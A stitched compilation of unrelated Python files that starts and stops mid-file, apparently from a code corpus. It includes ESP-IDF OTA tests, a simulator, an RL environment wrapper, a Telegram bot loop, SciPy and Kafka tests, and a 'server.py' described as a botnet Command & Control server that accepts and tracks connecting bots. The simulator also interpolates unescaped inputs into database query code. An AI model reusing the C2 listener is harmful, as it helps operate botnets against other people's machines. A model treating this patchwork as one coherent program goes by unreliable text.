    Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Random binary file to be generated
random_bin_name = 'random.bin'
    # Size of the random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
    # The first byte of the binary file is always set to zero. If the first byte were generated randomly,
    # it could occasionally be 0xE9 (the valid image magic byte), which would cause the test case to fail.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file over HTTPS from a chunked-encoding server.
    The device is then expected to reboot into the new OTA image.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_chunked()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
simulator.py
|
# SIM-CITY webservice
#
# Copyright 2015 Joris Borgdorff <j.borgdorff@esciencecenter.nl>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import simcity
from picas.documents import Task
from numbers import Number
import multiprocessing as mp
import traceback
class Simulator(object):
"""
SIM-CITY simulator
"""
def __init__(self, ensemble, version, command, scoring, host, max_jobs=4,
polling_time=60, argnames=None, argprecisions=None,
couchdb=None, use_cache=False):
self.couchdb = couchdb
self.ensemble = ensemble
self.version = version
self.command = command
self.scoring = scoring
self.host = host
self.max_jobs = max_jobs
self.default_host = host
self.polling_time = polling_time
self.argnames = argnames
self.argprecisions = argprecisions
self.use_cache = use_cache
self.current_pid = 0
self.proc_q = mp.Queue()
self.proc = {}
def _keyval(self, p, i):
try:
key = self.argnames[i]
except (TypeError, IndexError):
key = str(i)
try:
value = p[i] - (p[i] % self.argprecisions[i])
except (TypeError, IndexError):
value = p[i]
return (key, value)
def __call__(self, p, host=None):
if host is None:
host = self.default_host
kwargs = dict(self._keyval(p, i) for i in range(len(p)))
task = None
if self.use_cache:
js_input = ""
for key in kwargs:
if isinstance(kwargs[key], Number):
js_input += "&& doc.input['%s'] == %f" % (key, kwargs[key])
else:
js_input += "&& doc.input['%s'] == '%s'" % (
key, str(kwargs[key]))
map_fun = '''function(doc) {
if (doc.type == 'task' && doc.done > 0 &&
doc.command == '%s' && doc.version == '%s' %s) {
emit(doc._id, doc)
}
}''' % (self.command, self.version, js_input)
for row in simcity.get_task_database().db.query(map_fun, limit=1):
task = Task(row.value)
print("using cache")
if task is None:
task, job = simcity.run_task({
'command': self.command,
'version': self.version,
'input': kwargs,
'ensemble': self.ensemble,
}, self.host, self.max_jobs, polling_time=self.polling_time)
if task.has_error():
raise EnvironmentError('Simulation %s failed: %s'
% (task.id, str(task.get_errors())))
return self.scoring(task)
def start(self, p, host=None):
self.current_pid += 1
self.proc[self.current_pid] = mp.Process(
target=run_simulator, args=(self, self.current_pid, p, host,))
self.proc[self.current_pid].start()
return self.current_pid
def join(self):
pid, value = self.proc_q.get()
self.proc[pid].join()
del self.proc[pid]
return (pid, value,)
def has_result(self):
return not self.proc_q.empty()
def is_running(self):
return len(self.proc) > 0 or self.has_result()
def run_simulator(simulator, pid, p, host):
try:
# reinitialize database connections in each thread
simcity.init(simcity.get_config())
value = simulator(p, host)
simulator.proc_q.put((pid, value,))
except Exception as ex:
traceback.print_exc()
simulator.proc_q.put((pid, ex,))
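# Usage sketch (all names below are hypothetical; `score_task` is assumed to
# map a finished picas Task document to a float, and simcity is assumed to be
# configured before any call):
#
#     sim = Simulator(ensemble='demo', version='0.1', command='run.sh',
#                     scoring=score_task, host='localhost',
#                     argnames=['x', 'y'])
#     pid = sim.start([0.5, 1.5])   # non-blocking, runs in a subprocess
#     pid, value = sim.join()       # blocks until one result is ready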
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
import time
import sys
sys.path.append("/home/jupyter/Notebooks/Chang/HardRLWithYoutube")
USE_IMMITATION_ENV = True
if USE_IMMITATION_ENV:
print(sys.path)
from TDCFeaturizer import TDCFeaturizer
from train_featurizer import generate_dataset
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
if USE_IMMITATION_ENV:
self.featurizer = TDCFeaturizer(92, 92, 84, 84, feature_vector_size=1024, learning_rate=0, experiment_name='default')
self.featurizer.load()
video_dataset = generate_dataset('default', framerate=30/15, width=84, height=84)[0]
self.featurized_dataset = self.featurizer.featurize(video_dataset)
self.checkpoint_indexes = [0] * nenvs
self.rewards = 0
self.counter = 0
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
obs, rews, dones = np.stack(obs), np.stack(rews), np.stack(dones)
print("obs shape: ", obs.shape)
if USE_IMMITATION_ENV:
state_feature_vectors = self.featurizer.featurize(obs)
dot_products = [np.dot(state_feature_vectors[i], self.featurized_dataset[self.checkpoint_indexes[i]]) for i in range(self.nenvs)]
gamma_threshold = 0.5
immitation_rewards = [0.5 if dot_product > gamma_threshold else 0 for dot_product in dot_products]
rews += immitation_rewards
mean_rews = np.mean(rews)
self.rewards += mean_rews
self.counter += 1
if self.counter == 10000:
print('10000 rewards: ', self.rewards)
self.rewards = 0
self.counter = 0
#if dot_products[0] > 0.5:
# print(dot_products, immitation_rewards[0], rews)
self.checkpoint_indexes = [self.checkpoint_indexes[i] + 1 if immitation_rewards[i] > 0 else self.checkpoint_indexes[i] for i in range(self.nenvs)]
#print(self.checkpoint_indexes[0])
self.checkpoint_indexes = [0 if dones[i] else self.checkpoint_indexes[i] for i in range(self.nenvs)]
return obs, rews, dones, infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
self.checkpoint_indexes = [0] * self.nenvs
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
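# Usage sketch (hypothetical; make_env(rank) is assumed to return a thunk that
# builds a gym environment, and with USE_IMMITATION_ENV enabled the TDC
# featurizer checkpoint and video dataset are assumed to be available):
#
#     vec_env = SubprocVecEnv([make_env(i) for i in range(4)])
#     obs = vec_env.reset()
#     actions = [vec_env.action_space.sample() for _ in range(4)]
#     obs, rews, dones, infos = vec_env.step(actions)
#     vec_env.close()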
|
server.py
|
# Date: 09/28/2017
# Author: Ethical-H4CK3R
# Description: CnC Server
import time
import socket
import threading
class Server(object):
''' Command & Control '''
def __init__(self):
self.server = None
self.server_status = False
def kill(self, session):
try:
session.shutdown(socket.SHUT_RDWR)
session.close()
except:pass
def disconnect(self, exit=False):
if exit:
print '\n[-] Exiting ...'
time.sleep(2.5)
self.server_status = False
self.alive = False
self.ping = False
self.kill(self.server)
del self.botnet[:]
def cncServer(self):
while self.alive and self.server_status:
try:
session, ip = self.server.accept()
threading.Thread(target=self.addBot, args=[session]).start()
except socket.timeout:pass
            except:self.restartServer()
def startServer(self, verbose=True):
try:
if self.server_status:self.restartServer();return
if verbose:print 'Starting server on {}:{} ...'.format(self.ip, self.port)
time.sleep(2.5)
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((self.ip, self.port))
self.server.settimeout(0.5)
self.server.listen(1)
self.server_status = True
self.activeIP = self.ip
self.activePort = self.port
threading.Thread(target=self.cncServer).start()
except:
            print '[-] Error: Failed to start server, validate your IP address and try again'
def stopServer(self, verbose=True):
try:
if not self.server_status:return
if verbose:print 'Stopping server ...'
time.sleep(2.5)
self.disconnect()
except:
print '[-] Error: Failed to stop server'
def restartServer(self):
try:
if not self.server_status:self.startServer();return
print 'Restarting server on {}:{} ...'.format(self.ip, self.port)
time.sleep(2.5)
self.stopServer(False)
self.startServer(False)
except:pass
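# Usage sketch (hypothetical): Server is written as a mixin. Attributes such as
# self.ip, self.port, self.alive, self.ping and self.botnet, plus the addBot()
# method used by cncServer(), are expected to come from the inheriting class:
#
#     class CnC(Server):
#         def __init__(self, ip, port):
#             Server.__init__(self)
#             self.ip, self.port = ip, port
#             self.alive, self.ping, self.botnet = True, True, []
#         def addBot(self, session):
#             self.botnet.append(session)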
|
loop.py
|
import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
def run_as_thread(self, *args, **kwargs):
t = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class CollectLoop(RunForeverAsThread):
def __init__(self, handle):
self._handle = handle
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self):
while 1:
try:
msg = self._inqueue.get(block=True)
self._handle(msg)
except:
traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
def __init__(self, bot, on_update):
self._bot = bot
self._update_handler = on_update
def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
"""
Process new updates in infinity loop
:param relax: float
:param offset: int
:param timeout: int
:param allowed_updates: bool
"""
while 1:
try:
result = self._bot.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_updates)
# Once passed, this parameter is no longer needed.
allowed_updates = None
# No sort. Trust server to give messages in correct order.
for update in result:
self._update_handler(update)
offset = update['update_id'] + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query',
'my_chat_member',
'chat_member',])
return key, update[key]
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._handle = _infer_handler_function(bot, handle)
def run_forever(self, *args, **kwargs):
"""
:type relax: float
:param relax: seconds between each :meth:`.getUpdates`
:type offset: int
:param offset:
initial ``offset`` parameter supplied to :meth:`.getUpdates`
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
controlling which types of updates to receive.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
collectloop = CollectLoop(self._handle)
updatesloop = GetUpdatesLoop(self._bot,
lambda update:
collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
# feed events to collect loop
self._bot.scheduler.on_event(collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
updatesloop.run_as_thread(*args, **kwargs)
collectloop.run_forever() # blocking
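# Usage sketch (hypothetical token and handler; the telepot.Bot instance is
# created by the caller, it is not part of this module):
#
#     bot = telepot.Bot('TOKEN')
#     def handle(msg):
#         print(msg)
#     MessageLoop(bot, handle).run_as_thread(timeout=20)
#     while 1:
#         time.sleep(10)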
class Webhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
def run_forever(self):
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._collectloop.run_forever()
def feed(self, data):
update = _dictify(data)
self._collectloop.input_queue.put(_extract_message(update)[1])
class Orderer(RunForeverAsThread):
def __init__(self, on_ordered_update):
self._on_ordered_update = on_ordered_update
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self, maxhold=3):
def handle(update):
self._on_ordered_update(update)
return update['update_id']
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
update = self._inqueue.get(block=True, timeout=qwait)
if max_id is None:
# First message received, handle regardless.
max_id = handle(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = handle(update)
                    # clear contiguous updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft()) # updates that arrived earlier, handle them.
else:
                                    break # gap, no more contiguous updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
                    # Update arrives prematurely; insert it into the buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
self._orderer = Orderer(lambda update:
self._collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
def run_forever(self, *args, **kwargs):
"""
:type maxhold: float
:param maxhold:
The maximum number of seconds an update is held waiting for a
not-yet-arrived smaller ``update_id``. When this number of seconds
is up, the update is delivered to the message-handling function
even if some smaller ``update_id``\s have not yet arrived. If those
smaller ``update_id``\s arrive at some later time, they are discarded.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._orderer.run_as_thread(*args, **kwargs)
self._collectloop.run_forever()
def feed(self, data):
"""
:param data:
One of these:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
"""
update = _dictify(data)
self._orderer.input_queue.put(update)
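# Usage sketch for OrderedWebhook (hypothetical Flask app; Flask, the bot and
# the handler are assumptions, not part of this module):
#
#     webhook = OrderedWebhook(bot, handle)
#     webhook.run_as_thread()
#
#     @app.route('/webhook', methods=['POST'])
#     def pass_update():
#         webhook.feed(request.data)
#         return 'OK'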
|
condition_objects_03.py
|
import threading
from random import randint
from time import sleep
from queue import Queue
queue_resource = Queue()
condition = threading.Condition(lock=threading.Lock())
def producer() -> None:
for i in range(2):
sleep(3)
condition.acquire()
resource: str = f'resource_{randint(0, 10)}'
queue_resource.put(resource)
print(f'producer {threading.current_thread().name} -> {resource} produced')
condition.notify()
condition.release()
def consumer() -> None:
condition.acquire()
print(f'consumer {threading.current_thread().name} -> waiting resource')
condition.wait()
print(f'consumer {threading.current_thread().name} -> {queue_resource.get()} consumed')
condition.release()
thread_producer = threading.Thread(name='thread_producer', target=producer)
thread_consumer_1 = threading.Thread(name='thread_consumer_1', target=consumer)
thread_consumer_2 = threading.Thread(name='thread_consumer_2', target=consumer)
thread_producer.start()
thread_consumer_1.start()
thread_consumer_2.start()
|
test_ccallback.py
|
from numpy.testing import assert_equal, assert_
from pytest import raises as assert_raises
import time
import pytest
import ctypes
import threading
from scipy._lib import _ccallback_c as _test_ccallback_cython
from scipy._lib import _test_ccallback
from scipy._lib._ccallback import LowLevelCallable
try:
import cffi
HAVE_CFFI = True
except ImportError:
HAVE_CFFI = False
ERROR_VALUE = 2.0
def callback_python(a, user_data=None):
if a == ERROR_VALUE:
raise ValueError("bad value")
if user_data is None:
return a + 1
else:
return a + user_data
def _get_cffi_func(base, signature):
if not HAVE_CFFI:
pytest.skip("cffi not installed")
# Get function address
voidp = ctypes.cast(base, ctypes.c_void_p)
address = voidp.value
# Create corresponding cffi handle
ffi = cffi.FFI()
func = ffi.cast(signature, address)
return func
def _get_ctypes_data():
value = ctypes.c_double(2.0)
return ctypes.cast(ctypes.pointer(value), ctypes.c_voidp)
def _get_cffi_data():
if not HAVE_CFFI:
pytest.skip("cffi not installed")
ffi = cffi.FFI()
return ffi.new('double *', 2.0)
CALLERS = {
'simple': _test_ccallback.test_call_simple,
'nodata': _test_ccallback.test_call_nodata,
'nonlocal': _test_ccallback.test_call_nonlocal,
'cython': _test_ccallback_cython.test_call_cython,
}
# These functions have signatures known to the callers
FUNCS = {
'python': lambda: callback_python,
'capsule': lambda: _test_ccallback.test_get_plus1_capsule(),
'cython': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1_cython"),
'ctypes': lambda: _test_ccallback_cython.plus1_ctypes,
'cffi': lambda: _get_cffi_func(_test_ccallback_cython.plus1_ctypes,
'double (*)(double, int *, void *)'),
'capsule_b': lambda: _test_ccallback.test_get_plus1b_capsule(),
'cython_b': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1b_cython"),
'ctypes_b': lambda: _test_ccallback_cython.plus1b_ctypes,
'cffi_b': lambda: _get_cffi_func(_test_ccallback_cython.plus1b_ctypes,
'double (*)(double, double, int *, void *)'),
}
# These functions have signatures the callers don't know
BAD_FUNCS = {
'capsule_bc': lambda: _test_ccallback.test_get_plus1bc_capsule(),
'cython_bc': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1bc_cython"),
'ctypes_bc': lambda: _test_ccallback_cython.plus1bc_ctypes,
'cffi_bc': lambda: _get_cffi_func(_test_ccallback_cython.plus1bc_ctypes,
'double (*)(double, double, double, int *, void *)'),
}
USER_DATAS = {
'ctypes': _get_ctypes_data,
'cffi': _get_cffi_data,
'capsule': _test_ccallback.test_get_data_capsule,
}
def test_callbacks():
def check(caller, func, user_data):
caller = CALLERS[caller]
func = FUNCS[func]()
user_data = USER_DATAS[user_data]()
if func is callback_python:
func2 = lambda x: func(x, 2.0)
else:
func2 = LowLevelCallable(func, user_data)
func = LowLevelCallable(func)
# Test basic call
assert_equal(caller(func, 1.0), 2.0)
# Test 'bad' value resulting to an error
assert_raises(ValueError, caller, func, ERROR_VALUE)
# Test passing in user_data
assert_equal(caller(func2, 1.0), 3.0)
for caller in sorted(CALLERS.keys()):
for func in sorted(FUNCS.keys()):
for user_data in sorted(USER_DATAS.keys()):
check(caller, func, user_data)
def test_bad_callbacks():
def check(caller, func, user_data):
caller = CALLERS[caller]
user_data = USER_DATAS[user_data]()
func = BAD_FUNCS[func]()
if func is callback_python:
func2 = lambda x: func(x, 2.0)
else:
func2 = LowLevelCallable(func, user_data)
func = LowLevelCallable(func)
# Test that basic call fails
assert_raises(ValueError, caller, LowLevelCallable(func), 1.0)
# Test that passing in user_data also fails
assert_raises(ValueError, caller, func2, 1.0)
# Test error message
llfunc = LowLevelCallable(func)
try:
caller(llfunc, 1.0)
except ValueError as err:
msg = str(err)
assert_(llfunc.signature in msg, msg)
assert_('double (double, double, int *, void *)' in msg, msg)
for caller in sorted(CALLERS.keys()):
for func in sorted(BAD_FUNCS.keys()):
for user_data in sorted(USER_DATAS.keys()):
check(caller, func, user_data)
def test_signature_override():
caller = _test_ccallback.test_call_simple
func = _test_ccallback.test_get_plus1_capsule()
llcallable = LowLevelCallable(func, signature="bad signature")
assert_equal(llcallable.signature, "bad signature")
assert_raises(ValueError, caller, llcallable, 3)
llcallable = LowLevelCallable(func, signature="double (double, int *, void *)")
assert_equal(llcallable.signature, "double (double, int *, void *)")
assert_equal(caller(llcallable, 3), 4)
def test_threadsafety():
def callback(a, caller):
if a <= 0:
return 1
else:
res = caller(lambda x: callback(x, caller), a - 1)
return 2*res
def check(caller):
caller = CALLERS[caller]
results = []
count = 10
def run():
time.sleep(0.01)
r = caller(lambda x: callback(x, caller), count)
results.append(r)
threads = [threading.Thread(target=run) for j in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert_equal(results, [2.0**count]*len(threads))
for caller in CALLERS.keys():
check(caller)
|
test_sink_integration.py
|
import threading
from typing import Callable, Dict, List, Tuple
from unittest import mock
import pytest
from pyconnect.config import SinkConfig
from pyconnect.core import Status
from .utils import PyConnectTestSink, TestException, compare_lists_unordered
ConnectSinkFactory = Callable[..., PyConnectTestSink]
@pytest.fixture
def connect_sink_factory(
running_cluster_config: Dict[str, str], topic_and_partitions: Tuple[str, int]
) -> ConnectSinkFactory:
"""
    Creates a factory that can be used to create readily usable instances of :class:`test.utils.PyConnectTestSink`.
If necessary, any config parameter can be overwritten by providing a custom config as argument to the factory.
"""
topic_id, partitions = topic_and_partitions
group_id = topic_id + "_sink_group_id"
sink_config = SinkConfig(
{
"bootstrap_servers": running_cluster_config["broker"],
"schema_registry": running_cluster_config["schema-registry"],
"offset_commit_interval": 1,
"group_id": group_id,
"poll_timeout": 2,
"topics": topic_id,
}
)
def connect_sink_factory_(custom_config=None):
if custom_config is not None:
config = sink_config.copy()
config.update(custom_config)
else:
config = sink_config
test_sink = PyConnectTestSink(config)
test_sink.max_runs = 30
return test_sink
return connect_sink_factory_
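# Illustrative usage sketch (not part of the original tests; it mirrors the tests below):
# any config key can be overridden by passing a custom dict to the factory.
#
#     connect_sink = connect_sink_factory({"offset_commit_interval": 2})
#     connect_sink.run()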
@pytest.mark.integration
def test_message_consumption(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
connect_sink = connect_sink_factory()
connect_sink.run()
compare_lists_unordered(produced_messages, connect_sink.flushed_messages)
@pytest.mark.integration
def test_offset_commit_on_restart(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
def patch_commit(sink: PyConnectTestSink) -> mock.Mock:
old_func = sink._consumer.commit
mocked_func = mock.Mock(name="commit", wraps=old_func)
sink._consumer.commit = mocked_func
return mocked_func
connect_sink = connect_sink_factory()
commit_mock = patch_commit(connect_sink)
connect_sink.run()
expected_call = commit_mock.call_args
compare_lists_unordered(produced_messages, connect_sink.flushed_messages)
connect_sink = connect_sink_factory()
commit_mock = patch_commit(connect_sink)
connect_sink.max_idle_count = 2
connect_sink.run()
    assert len(expected_call[1]["offsets"]) > 0, f"No offsets committed during commit! {expected_call}"
assert expected_call == commit_mock.call_args
@pytest.mark.integration
def test_continue_after_crash(produced_messages: List[Tuple[str, dict]], connect_sink_factory: ConnectSinkFactory):
connect_sink = connect_sink_factory({"kafka_opts": {"max.poll.interval.ms": 10000, "session.timeout.ms": 6000}})
connect_sink.with_method_raising_after_n_calls("on_message_received", TestException(), 7)
connect_sink.with_mock_for("close")
with pytest.raises(TestException):
connect_sink.run()
flushed_messages = connect_sink.flushed_messages
connect_sink = connect_sink_factory()
connect_sink.run()
flushed_messages.extend(connect_sink.flushed_messages)
compare_lists_unordered(produced_messages, flushed_messages)
@pytest.mark.integration
def test_two_sinks_one_failing(
topic_and_partitions: Tuple[str, int], produced_messages: List[Tuple[str, dict]], connect_sink_factory
):
_, partitions = topic_and_partitions
if partitions == 1:
return # we need to test multiple consumers on multiple partitions for rebalancing issues
conf = {"offset_commit_interval": 2}
failing_sink = connect_sink_factory(conf)
failing_sink.with_method_raising_after_n_calls("on_message_received", TestException(), 3)
failing_sink.with_wrapper_for("on_message_received")
running_sink = connect_sink_factory(conf)
running_sink.with_wrapper_for("on_message_received")
running_sink.max_idle_count = 5
running_sink_thread = threading.Thread(target=running_sink.run, name="RUNNING Sink")
failing_sink_thread = threading.Thread(target=failing_sink.run, name="FAILING Sink")
running_sink_thread.start()
failing_sink_thread.start()
running_sink_thread.join()
failing_sink_thread.join()
assert running_sink.on_message_received.called, "Running sink should have received messages"
assert failing_sink.on_message_received.called, "Failing sink should have received messages"
assert len(failing_sink.flushed_messages) == 2, "Only messages before crash should be flushed"
assert failing_sink.status == Status.CRASHED
assert isinstance(failing_sink.status_info, TestException)
assert running_sink.status == Status.STOPPED
flushed_messages = running_sink.flushed_messages + failing_sink.flushed_messages
compare_lists_unordered(produced_messages, flushed_messages)
|
hot.py
|
import json
import time
from . import api
from flask import jsonify
from threading import Thread
def cache_hot(api, spider_func, key):
    """
    Fetch and cache the hot-list data for the given forum key.
    :param api: the api blueprint/app object (provides logger, redis_con and hot_spider)
    :param spider_func: the spider function that scrapes the hot list
    :param key: the cache key (forum code)
    :return:
    """
    try:
